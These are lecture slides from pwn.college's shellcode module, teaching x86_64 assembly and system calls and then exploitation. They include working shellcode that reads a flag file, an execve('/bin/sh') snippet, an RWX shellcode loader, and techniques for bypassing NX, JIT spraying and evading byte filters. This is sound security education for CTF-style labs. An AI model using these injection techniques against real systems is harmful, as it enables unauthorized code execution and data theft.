pwn.college: Shellcode

Yan Shoshitaishvili

Arizona State University

The story so far...

In Module 1, we learned about how Linux programs work from the high level...

Now, we'll understand how their code runs and interacts with the environment!

Module 1

Module 2

All roads lead to the CPU

All software eventually runs on your CPU, as low-level machine instructions.

Programs written in compiled languages (C, C++, Rust, etc.) run the machine code that they ship as.

Programs written in interpreted languages (Python, JavaScript, etc.) are either JIT-compiled immediately before being run, or run by a compiled interpreter (in fancy cases, this interpreter is JIT-compiled itself).

To truly understand how all of this crazy stuff works, we need to understand what happens at the low level!

P.S. Your Computer Organization class should have taught you all of this.

Where do binary files go to?

http://www.electronics-tutorials.ws/logic/logic_1.html

All our powers combined...

http://www.electronics-tutorials.ws/category/combination

Computer Architecture (at a very high level)

[Diagram: CPU, Memory, Disk, and Network + Others, connected by "some sort of bridge."]

Computer Architecture (drilling down)

[Diagram: CPU (containing CU, ALU, and Registers), Memory, Disk, and Network + Others, connected by "some sort of bridge."]

Computer Architecture (further down!)

[Diagram: CPU (containing Cache, CU, ALU, and Registers), Memory, Disk, and Network + Others, connected by "some sort of bridge."]

Computer Architecture (as far as we'll go)

[Diagram: CPU (containing an L2 Cache and two sets of L1 Cache, CU, ALU, and Registers), Memory, Disk, and Network + Others, connected by "some sort of bridge."]

John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John von Neumann (Mathematician)

John von Neumann, First Draft of a Report on the EDVAC, 1945.

Assembly

The only true programming language, as far as a CPU is concerned.

Concepts:

  • instructions
    • data manipulation instructions
    • comparison instructions
    • control flow instructions
    • system calls
  • registers
  • memory
    • program
    • stack
    • other mapped mem

Registers

Registers are very fast, temporary stores for data.

x86: eax, ecx, edx, ebx, esp, ebp, esi, edi

amd64: rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15

arm: r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, r13, r14

The address of the next instruction is in a register:

eip (x86), rip (amd64), r15 (arm)

Various extensions add other registers (x87, MMX, SSE, etc).

Instructions

General form:

OPCODE OPERAND, OPERAND, ...

OPCODE - what to do

OPERANDS - what to do it on/with

mov rax, rbx

add rax, 1

cmp rax, rbx

jb some_location

Useful reference: http://ref.x86asm.net

Instructions (data manipulation)

Instructions can move and manipulate data in registers and memory.

mov rax, rbx

mov rax, [rbx+4]

add rax, rbx

imul rsi, rdi

inc rax

inc qword ptr [rax]

Instructions (control flow)

Control flow is determined by conditional and unconditional jumps.

Unconditional: call, jmp, ret

Conditional:

je    jump if equal
jne   jump if not equal
jg    jump if greater
jl    jump if less
jle   jump if less than or equal
jge   jump if greater than or equal
ja    jump if above (unsigned)
jb    jump if below (unsigned)
jae   jump if above or equal (unsigned)
jbe   jump if below or equal (unsigned)
js    jump if signed
jns   jump if not signed
jo    jump if overflow
jno   jump if not overflow
jz    jump if zero
jnz   jump if not zero

Instructions (conditionals)

Conditionals key off of the "flags" register: eflags (x86), rflags (amd64), apsr (arm)

Updated by (x86/amd64):

  • arithmetic operations
  • cmp - subtraction (cmp rax, rbx)
  • test - and (test rax, rax)

je    jump if equal                        ZF=1
jne   jump if not equal                    ZF=0
jg    jump if greater                      ZF=0 and SF=OF
jl    jump if less                         SF!=OF
jle   jump if less than or equal           ZF=1 or SF!=OF
jge   jump if greater than or equal        SF=OF
ja    jump if above (unsigned)             CF=0 and ZF=0
jb    jump if below (unsigned)             CF=1
jae   jump if above or equal (unsigned)    CF=0
jbe   jump if below or equal (unsigned)    CF=1 or ZF=1
js    jump if signed                       SF=1
jns   jump if not signed                   SF=0
jo    jump if overflow                     OF=1
jno   jump if not overflow                 OF=0
jz    jump if zero                         ZF=1
jnz   jump if not zero                     ZF=0
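As a worked illustration of the table above, here is a minimal C sketch that models how `cmp a, b` sets the flags for 64-bit operands and which jumps would then be taken. The names `struct flags`, `cmp64`, and the `takes_*` helpers are made up for this example; this is a model of the flag rules, not how the CPU implements them.

```c
#include <stdbool.h>
#include <stdint.h>

/* Flags produced by `cmp a, b`: a subtraction a - b whose result is discarded. */
struct flags { bool zf, sf, cf, of; };

struct flags cmp64(uint64_t a, uint64_t b) {
    uint64_t r = a - b;                      /* wraps modulo 2^64 */
    struct flags f;
    f.zf = (r == 0);                         /* result is zero */
    f.sf = (r >> 63) & 1;                    /* top bit of the result */
    f.cf = (a < b);                          /* unsigned borrow */
    f.of = (((a ^ b) & (a ^ r)) >> 63) & 1;  /* signed overflow */
    return f;
}

/* Jump conditions, copied from the table. */
bool takes_je(struct flags f) { return f.zf; }
bool takes_jg(struct flags f) { return !f.zf && f.sf == f.of; }
bool takes_jl(struct flags f) { return f.sf != f.of; }
bool takes_ja(struct flags f) { return !f.cf && !f.zf; }
bool takes_jb(struct flags f) { return f.cf; }
```

For example, comparing 0xffffffffffffffff with 1 takes `jl` (it is -1 when read as signed) but also takes `ja` (it is the largest value when read as unsigned), which is why picking the signed or unsigned jump matters.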

Instructions (system calls)

Almost all programs have to interact with the outside world!

This is primarily done via system calls (man syscalls). Each system call is well-documented in section 2 of the man pages (e.g., man 2 open).

System calls (on amd64) are triggered by:

  • set rax to the system call number
  • store arguments in rdi, rsi, etc (more on this later)
  • execute the syscall instruction

We can trace process system calls using strace.
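The three steps above can be sketched from C with inline assembly. This is a minimal sketch assuming Linux and a GCC- or Clang-compatible compiler; `raw_syscall3` is a hypothetical helper name, and on non-amd64 targets it simply falls back to the libc `syscall()` wrapper.

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <unistd.h>

/* Issue a system call with up to three arguments.
 * On amd64: number in rax, arguments in rdi, rsi, rdx, result in rax.
 * The syscall instruction itself clobbers rcx and r11.
 * Note: the raw instruction returns -errno on failure, while the libc
 * fallback returns -1 and sets errno. */
long raw_syscall3(long nr, long a1, long a2, long a3) {
#if defined(__x86_64__)
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a1), "S"(a2), "d"(a3)
                      : "rcx", "r11", "memory");
    return ret;
#else
    return syscall(nr, a1, a2, a3);
#endif
}
```

Calling `raw_syscall3(SYS_write, 1, (long)"hi\n", 3)` writes three bytes to standard output; running the program under strace shows the resulting write call.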

System Calls

System calls have very well-defined interfaces that very rarely change.

There are over 300 system calls in Linux. Here are some examples:

int open(const char *pathname, int flags) - returns a new file descriptor for the opened file (also shows up in /proc/self/fd!)

ssize_t read(int fd, void *buf, size_t count) - reads data from the file descriptor

ssize_t write(int fd, const void *buf, size_t count) - writes data to the file descriptor

pid_t fork() - forks off an identical child process. Returns 0 if you're the child and the PID of the child if you're the parent.

int execve(const char *filename, char **argv, char **envp) - replaces your process with another program.

pid_t wait(int *wstatus) - wait on a child process to exit, return the PID, and write its status into *wstatus.

Typical syscall combinations:

  • fork, execve, wait (think: a shell)
  • open, read, write (cat)
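The fork, execve, wait combination can be sketched as the core of a shell's "run one command" step. This is a minimal sketch assuming a POSIX system; `run_program` is a hypothetical helper name, and it uses `waitpid` (a variant of `wait` that waits for one specific child) so that it collects the child it just created.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

extern char **environ;

/* Run the program at path with the given argv.
 * Returns its exit status, or -1 on failure or abnormal termination. */
int run_program(const char *path, char *const argv[]) {
    pid_t pid = fork();
    if (pid < 0)
        return -1;                    /* fork failed */
    if (pid == 0) {
        /* Child: replace this process image with the new program. */
        execve(path, argv, environ);
        _exit(127);                   /* only reached if execve failed */
    }
    /* Parent: wait for that child and decode its status. */
    int wstatus;
    if (waitpid(pid, &wstatus, 0) < 0)
        return -1;
    return WIFEXITED(wstatus) ? WEXITSTATUS(wstatus) : -1;
}
```

For example, with `char *argv[] = {"sh", "-c", "exit 7", NULL};`, the call `run_program("/bin/sh", argv)` returns 7 on a system that has /bin/sh.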

Memory (stack)

The stack fulfils four main uses:

  • Track the "callstack" of a program.
    • return addresses are "pushed" to the stack during a call and "popped" during a ret
  • Contain local variables of functions.
  • Provide scratch space (to alleviate register exhaustion).
  • Pass function arguments (always on x86, only for functions with "many" arguments on other architectures).

Relevant registers (amd64): rsp, rbp

Relevant instructions (amd64): push, pop

Memory (other mapped regions)

Other regions might be mapped in memory. We previously talked about regions loaded due to directives in the ELF headers, but functionality such as mmap and malloc can cause other regions to be mapped as well.

These don't come into play heavily yet, but will feature prominently in future assignments.

Memory (endianness)

Multi-byte data on most modern systems is stored "backwards" (little-endian): the least significant byte sits at the lowest address.

Why?

  • Performance (historical)
  • Ease of addressing for different sizes.
  • (apocryphal) 8086 compatibility
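To make the byte order concrete, here is a minimal C sketch that builds the 64-bit value whose little-endian memory image spells out a short string. `pack_le64` is a hypothetical helper name; the computation itself does not depend on the byte order of the machine that runs it.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Return the 64-bit value whose little-endian bytes are the first
 * (up to 8) characters of s, padded with zero bytes. */
uint64_t pack_le64(const char *s) {
    uint64_t v = 0;
    size_t n = strlen(s);
    if (n > 8)
        n = 8;
    for (size_t i = 0; i < n; i++)
        v |= (uint64_t)(unsigned char)s[i] << (8 * i);  /* byte i sits at address +i */
    return v;
}
```

`pack_le64("/flag")` evaluates to 0x00000067616c662f: read as a number, the string appears reversed, but when a little-endian machine stores that number, memory holds '/', 'f', 'l', 'a', 'g', 0x00 in address order.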

Calling conventions:

Caller and callee functions must agree on argument passing.

Linux x86: push arguments (in reverse order), then call (which pushes return address), return value in eax

Linux amd64: rdi, rsi, rdx, rcx, r8, r9, return value in rax (system calls use r10 in place of rcx)

Linux arm: r0, r1, r2, r3, return value in r0

Registers are shared between functions, so calling conventions agree on what registers are protected.

Linux amd64: rbx, rbp, r12, r13, r14, r15 are "callee-saved"

Educational Resources

Rappel (https://github.com/yrp604/rappel) lets you explore the effects of instructions.

pwndevils how2hack:

  • http://pwndevils.com/hacking/howtwohack.html
  • web interface to step-by-step understanding of x86
  • NOTE: we are using x86_64 today, but many of the concepts are transferable

Opcode listing: http://ref.x86asm.net/coder64.html

x86_64 architecture manual: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf

Security Concept: Code Injection

Code injection was used in one of the earliest documented exploits: the Morris worm.

  • Overflowed stack buffer in the fingerd service.
  • Injected code to scan adjacent hosts and propagate the worm.

(translated to x86_64 and paraphrased):

mov rax, 59

mov rdi, "/bin/sh"

mov rsi, 0

mov rdx, 0

syscall

Why was this possible?

John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John von Neumann (Mathematician)

John von Neumann, First Draft of a Report on the EDVAC, 1945.

Von Neumann Architecture vs Harvard Architecture

A Von Neumann architecture sees (and stores) code as data.

A Harvard architecture stores data and code separately.

Almost all general-purpose architectures (x86, ARM, MIPS, PPC, SPARC, etc) are Von Neumann.

Harvard architectures pop up in embedded use-cases (AVR, PIC).

Discussion: problems with viewing code and data interchangeably?

Why "shell"code?

Usually, the goal of an exploit is to achieve arbitrary command execution.

The easiest way to do this is to launch a shell (i.e., "/bin/sh"). For our purposes, we can also sendfile(1, open("/flag", O_RDONLY), 0, 1000).

Thus: "shellcode"

Building Shellcode

First, write your shellcode as assembly:

.intel_syntax noprefix
.globl _start
_start:
    /* push '/flag\x00' */
    mov rbx, 0x00000067616c662f
    push rbx
    /* call open(rsp, O_RDONLY) */
    mov rax, 2
    mov rdi, rsp
    mov rsi, 0
    syscall
    /* call sendfile(1, fd, 0, 1000) */
    mov rdi, 1
    mov rsi, rax
    mov rdx, 0
    mov r10, 1000
    mov rax, 40
    syscall
    /* call exit(); rdi still holds 1 */
    mov rax, 60
    syscall

Then, assemble and extract it:

gcc -nostdlib shellcode.s -o shellcode-runner
objcopy --dump-section .text=shellcode-raw shellcode-runner

Now, your shellcode is in the "shellcode-raw" file! This method works great with cross-compilers to create shellcode for other architectures.

Testing Shellcode (without the trick on the last slide)

To test your shellcode, build a shellcode loader:

/* needs <sys/mman.h> and <unistd.h>; anonymous mappings take fd = -1 */
void *page = mmap((void *)0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);
read(0, page, 0x1000);
((void(*)())page)();

Then cat shellcode-raw | ./tester
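A fuller version of the loader, with error checking, might look like the following. This is a minimal sketch assuming Linux; `load_shellcode` and `PAGE_LEN` are hypothetical names, and the address 0x1337000 is only a hint to mmap, so the page may end up elsewhere.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

#define PAGE_LEN 0x1000

/* Map one readable, writable, executable page and fill it with up to
 * PAGE_LEN bytes read from fd. Returns the page, or NULL on failure.
 * If len_out is non-NULL, it receives the number of bytes loaded. */
void *load_shellcode(int fd, size_t *len_out) {
    void *page = mmap((void *)0x1337000, PAGE_LEN,
                      PROT_READ | PROT_WRITE | PROT_EXEC,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return NULL;

    size_t total = 0;
    while (total < PAGE_LEN) {
        ssize_t n = read(fd, (char *)page + total, PAGE_LEN - total);
        if (n < 0) {
            munmap(page, PAGE_LEN);
            return NULL;
        }
        if (n == 0)          /* end of input */
            break;
        total += (size_t)n;
    }
    if (len_out != NULL)
        *len_out = total;
    return page;
}
```

A `main` for the tester would call `load_shellcode(0, NULL)` and, if the result is not NULL, jump to it with `((void (*)(void))page)();`. Reading in a loop matters when the shellcode arrives through a pipe in several pieces.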

Use a cross-compiler and qemu to test shellcode for other architectures.

Alternatively, you can update the binary from the previous slide:

objcopy --update-section .text=shellcode-new shellcode-runner

Debugging Shellcode

GDB is your friend.

strace is your friend.

Hardcoded breakpoints are your friends!

  • breakpoints are implemented with the int3 instruction
  • you can place this anywhere yourself!
  • demo time!

Challenges in Shellcoding

Memory Access Trickiness

Think about the implications of code being data!

Be careful about sizes of memory access:

single byte:    mov [rax], bl
2-byte word:    mov [rax], bx
4-byte dword:   mov [rax], ebx
8-byte qword:   mov [rax], rbx

Mitigation: the "No-eXecute" bit

Finally, computer architectures wised up!

Modern architectures support memory permissions:

  • PROT_READ allows the process to read memory
  • PROT_WRITE allows the process to write memory
  • PROT_EXEC allows the process to execute memory

Intuition: normally, all code is located in .text segments of the loaded ELF files. There is no need to execute code located on the stack or in the heap.

By default in modern systems, the stack and the heap are not executable.

YOUR SHELLCODE NEEDS TO EXECUTE.

Game over?

The "No-eXecute" bit

The rise of NX has made shellcoding rarer.

It is now... an ancient art!

Remaining Injection Points - de-protecting memory

Vector 1: abuse the program to mprotect() memory.

Memory can be made executable using the mprotect() system call:

  • Trick the program into mprotect(PROT_EXEC)ing our shellcode.
  • Jump to the shellcode.

How do we do the first step?

  • Most common way is code reuse through Return Oriented Programming, where we stitch pieces of a program together to achieve our goal. We will cover this in a future module.
  • Other cases are situational, depending on what the program is designed to do.

Remaining Injection Points - JIT

Vector 2: target a JIT.

  • Just in Time compilers need to generate (and frequently re-generate) code that is executed.
  • Pages must be writable for code generation.
  • Pages must be executable for execution.
  • Pages must be writable for code re-generation.

The safe thing to do would be to:

  • mmap(PROT_READ|PROT_WRITE)
  • write the code
  • mprotect(PROT_READ|PROT_EXEC)
  • execute
  • mprotect(PROT_READ|PROT_WRITE)
  • update code
  • etc...
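The safe sequence above can be sketched in C as follows. This is a minimal sketch assuming Linux, a GCC- or Clang-compatible compiler, and generated code that follows the C calling convention and returns an int; `jit_fn`, `jit_emit`, `jit_unlock`, and `JIT_PAGE_LEN` are hypothetical names.

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <string.h>
#include <sys/mman.h>

#define JIT_PAGE_LEN 0x1000

typedef int (*jit_fn)(void);

/* Copy code into a fresh page while it is writable, then flip the page
 * to read + execute. The page is never writable and executable at once.
 * Returns a callable pointer, or NULL on failure. */
jit_fn jit_emit(const unsigned char *code, size_t len) {
    if (code == NULL || len == 0 || len > JIT_PAGE_LEN)
        return NULL;
    void *page = mmap(NULL, JIT_PAGE_LEN, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (page == MAP_FAILED)
        return NULL;
    memcpy(page, code, len);                       /* write the code */
    /* Needed on architectures with separate instruction caches. */
    __builtin___clear_cache((char *)page, (char *)page + len);
    if (mprotect(page, JIT_PAGE_LEN, PROT_READ | PROT_EXEC) != 0) {
        munmap(page, JIT_PAGE_LEN);
        return NULL;
    }
    return (jit_fn)page;
}

/* Make the page writable (and non-executable) again before updating code. */
int jit_unlock(jit_fn fn) {
    return mprotect((void *)fn, JIT_PAGE_LEN, PROT_READ | PROT_WRITE);
}
```

On x86_64, the bytes b8 2a 00 00 00 c3 (mov eax, 42; ret) passed to `jit_emit` yield a function that returns 42. Every update costs two mprotect() system calls, which is one reason an engine might be tempted to skip them.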

Obviously, not all JIT engines are safe...

Remaining Injection Points - JIT

Most JIT engines don't bother to mprotect(), but always have the pages executable.

Discussion: why is this?

Injection:

  • Corrupt a write pointer to point to the JIT page.
  • Write shellcode to the JIT page.
  • Corrupt a code pointer (such as a return address) to redirect execution into your shellcode.

Remaining Injection Points - JIT

What if the JIT safely mprotect()s its pages?

Shellcode injection technique: JIT spraying.

  • Make constants in the code that will be JITed:
    var evil = "%90%90%90%90%90";
  • The JIT engine will mprotect(PROT_WRITE), compile the code into memory, then mprotect(PROT_EXEC). Your constant is now present in executable memory.
  • Corrupt a code pointer to redirect execution into the constant.

If you can make many many constants, you can even mitigate the effects of Address Space Layout Randomization.

Remaining Injection Points - JIT

JIT is used everywhere: browsers, Java, and most interpreted language runtimes (luajit, pypy, etc), so this vector is very relevant.

Complications 1

Depending on how the program works, you might have to send shellcode matching some specific format:

Common conditions:

  • no NUL (0x00) bytes (e.g., shellcode injected via strcpy())
  • no newlines or spaces (scanf())
  • only printable characters
  • many other situations exist (and will be encountered in HW6).
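Before sending shellcode, it helps to check the assembled bytes against the filter. Here is a minimal C sketch of such a check; `find_bad_byte` is a hypothetical helper name, and the two byte arrays show one common x86_64 encoding of each instruction sequence (assemblers may choose others).

```c
#include <stddef.h>

/* mov rax, 59 : contains three zero bytes */
static const unsigned char mov_rax_59[] = {0x48, 0xc7, 0xc0, 0x3b, 0x00, 0x00, 0x00};

/* push 59; pop rax : same effect on rax, no zero bytes */
static const unsigned char push_pop_59[] = {0x6a, 0x3b, 0x58};

/* Return the offset of the first byte of code that appears in bad,
 * or -1 if the shellcode is clean. */
long find_bad_byte(const unsigned char *code, size_t len,
                   const unsigned char *bad, size_t nbad) {
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (code[i] == bad[j])
                return (long)i;
    return -1;
}
```

With the filter {0x00, 0x0a, 0x20} (NUL, newline, space), `mov_rax_59` fails at offset 4 while `push_pop_59` passes, so rewriting an instruction is often enough to satisfy a filter.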

Complications 2

Your shellcode might be mangled beyond recognition.

Common situations:

  • your shellcode might be sorted!
  • your shellcode might be compressed or uncompressed.
  • your shellcode might be encrypted or decrypted.
  • any other mangling could be applied...

Complications 3

Normally, your shellcode will just give you a shell (or the flag).

What if there is no way to output data (e.g., close(1); close(2);)?

What other ways can you use to communicate the flag?

Adapting to complications

  • Use jumps to jump over introduced garbage code.
    • very useful for sorted or JITed shellcode.
  • Understand what instructions you can inject.
    • useful library: capstone (apt install python-capstone)
  • Use an unpacking shellcode.
    • if the page where your shellcode resides is writable, it can modify itself!
    • this lets you use the few instructions you can to write other instructions and execute them.
  • Use a multi-stage shellcode.
    • stage 1: read(0, rip, 1000).
    • this overwrites your shellcode with unfiltered data!
    • stage 2: whatever you want!
    • a good stage-1 shellcode is very short, letting you get around complex shellcode requirements
    • downside: you don't always have access to inject more shellcode...
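One simple instance of the unpacking idea is single-byte XOR encoding, shown here as an assumption rather than as the method these slides prescribe. The encoder side can be sketched in C; `find_xor_key` and `xor_buf` are hypothetical names. The matching decoder stub, which would run first and XOR the payload back in place, has to be written in assembly and is not shown.

```c
#include <stddef.h>

/* Return a nonzero key byte that does not occur in code, or -1 if every
 * nonzero value occurs. XOR-ing with such a key never produces 0x00,
 * because x ^ key == 0 only when x == key. */
int find_xor_key(const unsigned char *code, size_t len) {
    unsigned char seen[256] = {0};
    for (size_t i = 0; i < len; i++)
        seen[code[i]] = 1;
    for (int key = 1; key < 256; key++)
        if (!seen[key])
            return key;
    return -1;
}

/* XOR every byte with key. Applying it twice restores the original. */
void xor_buf(unsigned char *buf, size_t len, unsigned char key) {
    for (size_t i = 0; i < len; i++)
        buf[i] ^= key;
}
```

The encoded payload is free of zero bytes, but the decoder stub must itself satisfy the filter, and the page holding the payload must be writable for in-place decoding to work.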